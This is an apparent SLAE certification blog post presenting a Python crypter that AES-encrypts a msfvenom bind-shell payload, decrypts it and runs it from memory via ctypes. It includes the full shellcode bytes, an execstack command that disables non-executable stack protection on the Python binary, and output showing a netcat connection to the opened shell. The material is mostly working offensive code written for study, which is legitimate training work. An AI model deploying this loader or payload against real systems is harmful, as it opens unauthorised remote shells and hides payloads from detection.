Sunday, January 11, 2015

7. encrypted shellcode

And the final mega boss to be defeated, the encrypted shellcode.

I have created a single python file for this task - for easy testing.
The python file encrypts the payload with AES, prints the encrypted payload, decrypts it, and runs it in python.

Before I was able to run the shellcode in python, I had to enable stack execution on the python binary. Otherwise, I was greeted with a nice Segmentation fault:

root@myserver:/home/ubuntu/SLAE_temp/7_crypter# ./shellcode.py
...
Segmentation fault (core dumped)
root@myserver:/home/ubuntu/SLAE_temp/7_crypter# execstack -q /usr/bin/python
- /usr/bin/python
root@myserver:/home/ubuntu/SLAE_temp/7_crypter# execstack -s /usr/bin/python
root@myserver:/home/ubuntu/SLAE_temp/7_crypter# execstack -q /usr/bin/python
X /usr/bin/python
Now that the non-executable stack protection is disabled, let's see my code (https://github.com/Z6543/My_SLAE/blob/master/07_encrypted_shellcode/encrypted_shellcode.py):
#!/usr/bin/python
#Author: Zoltan Balazs
#SLAE 607

from ctypes import *

from Crypto.Cipher import AES
import base64
import os


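def print_shellcode(shellcode):
        """Print *shellcode* as a ``\\xNN`` escaped hex string and return it.

        ``bytearray`` accepts both a Python 2 ``str`` and a Python 3 ``bytes``
        object, and ``print`` is called as a function with one argument, so this
        block runs unchanged on either interpreter (the original ``print x``
        statement was Python 2 only).

        Args:
            shellcode: the raw bytes to render.

        Returns:
            The escaped string that was printed (``""`` for empty input); callers
            that want the rendering no longer have to re-parse stdout.
        """
        # One '\xNN' token per byte; join is linear where repeated += is not
        # guaranteed to be.
        encoded = ''.join('\\x%02x' % b for b in bytearray(shellcode))
        print(encoded)
        return encoded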

BLOCK_SIZE = 32

PADDING = '{'


def pad(s):
        """Right-pad *s* with PADDING up to the next multiple of BLOCK_SIZE.

        An input whose length is already a multiple of BLOCK_SIZE still gets a
        full block of PADDING appended, so pad() never returns *s* unchanged.
        BLOCK_SIZE is 32, a multiple of the 16-byte AES block, so the result is
        always a valid AES input length.
        """
        fill = BLOCK_SIZE - len(s) % BLOCK_SIZE
        return s + PADDING * fill


def EncryptAES(c, s):
        """Pad *s* and encrypt it with the cipher object *c* (via ``c.encrypt``)."""
        return c.encrypt(pad(s))


def DecryptAES(c, e):
        """Decrypt *e* with *c* and strip the trailing PADDING characters.

        NOTE(review): ``rstrip`` removes every trailing '{' (0x7b), not only the
        ones pad() added, so a plaintext that itself ends in 0x7b comes back
        truncated. The payload in this file ends in 0xa0, so it is unaffected.
        """
        plaintext = c.decrypt(e)
        return plaintext.rstrip(PADDING)

# NOTE(review): the commented-out line below would make the 44-character
# base64 *text* the key, not 32 raw bytes; decode it (or drop the encoding)
# if it is ever re-enabled, since AES keys must be exactly 16/24/32 bytes.
#secret = base64.b64encode(os.urandom(BLOCK_SIZE))
# Fixed 32-byte key (44 base64 characters -> 32 raw bytes), i.e. AES-256.
# The key is stored in the same file as the ciphertext, so the encryption only
# obscures the payload; it offers no confidentiality to anyone who can read
# this script.
secret = (base64.b64decode("7dXwb5giAn7bJGp1VNfmu29oDK2r0mUkEEf9gVrtRE4="))

# No mode argument: with PyCrypto the default is ECB, so identical 16-byte
# plaintext blocks produce identical ciphertext blocks - acceptable for this
# exercise, not for real data.
cipher = AES.new(secret)

#output of msfvenom -p linux/x86/shell_bind_tcp -f python -e x86/shikata_ga_nai LPORT=12345
# 105 bytes, built up as a Python 2 byte string. On Python 3 these literals are
# text (the "\xNN" escapes become code points), and bytearray(buf) below would
# raise TypeError without an encoding - a b"" prefix would be needed there.
buf =  ""
buf += "\xb8\x35\x93\x35\x4b\xda\xc6\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x14\x83\xef\xfc\x31\x47\x10\x03\x47\x10\xd7"
buf += "\x66\x04\x90\xe0\x6a\x34\x65\x5d\x07\xb9\xe0\x80\x67"
buf += "\xdb\x3f\xc2\xd3\x7a\x92\xaa\xe1\x82\x22\x13\x8c\x92"
buf += "\x13\x33\xd9\x72\xf9\xd5\x81\xb9\x7e\x90\x73\x46\xcc"
buf += "\xa6\xc3\x20\xff\x26\x60\x1d\x99\xeb\xe7\xce\x3f\x99"
buf += "\xd8\xa8\x72\xdd\x6e\x30\x75\xb5\x5f\xed\xf6\x2d\xc8"
buf += "\xde\x9a\xc4\x66\xa8\xb8\x46\x24\x23\xdf\xd6\xc1\xfe"
buf += "\xa0"

# encrypt a string
# pad() rounds the 105-byte payload up to 128 bytes (next multiple of
# BLOCK_SIZE) before encryption, so the printed ciphertext is longer than buf.
encrypted_shellcode = EncryptAES(cipher, buf)

print 'Encrypted shellcode ...'
print_shellcode(encrypted_shellcode)

# decrypt the encrypted string
# Round trip with the same cipher object; rstrip removes the '{' padding. A
# mismatch at this step would hand corrupted bytes to the call below.
decrypted = DecryptAES(cipher, encrypted_shellcode)

print 'Decrypted shellcode ...'
print_shellcode(decrypted)

# Copy the plaintext into a ctypes-owned buffer. The size is passed explicitly
# so ctypes does not append its usual trailing NUL byte.
memorywithshell = create_string_buffer(decrypted, len(decrypted))
print (len(decrypted))   # 105 for this payload
# Reinterpret the buffer as a C function with no arguments (return type
# c_void_p) and call it. As the write-up notes, this segfaults unless the
# interpreter was marked with execstack -s; that flag affects every script run
# by /usr/bin/python, not only this one, and execstack -c clears it again.
shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p))

shellcode()

Let's test this:
root@myserver:/home/ubuntu/SLAE_temp/7_crypter# ./shellcode.py
Encrypted shellcode ...
\x1a\xa5\x0a\xe3\x2a\x2f\x95\x95\x29\x83\x21\xef\x5e\x9e\x6e\x91\xe0\x6c\x1c\xc9\xa1\x58\x29\x77\x4a\x4d\xbe\x3f\x4a\x76\xfb\x02\xfa\x38\xf3\x6d\xc4\x16\xcb\xfb\x34\x60\x04\x49\xf9\xc7\x3c\x12\xd8\x1c\xa7\x8f\x26\x9e\xf4\xe3\xe3\x4e\xdb\xc7\x82\x13\x23\x65\xc7\x03\x59\x79\xa6\x04\xe4\x3d\x3b\x48\x57\xee\xa9\xec\x85\xc3\xfb\x74\x9a\xc9\xe2\x33\x0a\x13\x56\x5c\x67\xe6\xd9\x91\xd9\xdf\xc6\x92\xea\xda\x6b\x27\x14\x5c\x7c\x7d\x96\x6a\xd3\xb7\x87\xd0\x69\xf8\x3d\xd4\xc7\x00\x6b\xe3\x4d\xf7\xc7\x88\x26\x9a\x08\x3f
Decrypted shellcode ...
\xb8\x35\x93\x35\x4b\xda\xc6\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1\x14\x83\xef\xfc\x31\x47\x10\x03\x47\x10\xd7\x66\x04\x90\xe0\x6a\x34\x65\x5d\x07\xb9\xe0\x80\x67\xdb\x3f\xc2\xd3\x7a\x92\xaa\xe1\x82\x22\x13\x8c\x92\x13\x33\xd9\x72\xf9\xd5\x81\xb9\x7e\x90\x73\x46\xcc\xa6\xc3\x20\xff\x26\x60\x1d\x99\xeb\xe7\xce\x3f\x99\xd8\xa8\x72\xdd\x6e\x30\x75\xb5\x5f\xed\xf6\x2d\xc8\xde\x9a\xc4\x66\xa8\xb8\x46\x24\x23\xdf\xd6\xc1\xfe\xa0
105

And in another window:
root@myserver:/home/ubuntu/SLAE_temp/7_crypter# nc 127.0.0.1 12345
ls
shellcode.py

That's all folks! :)
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student-ID: SLAE - 607
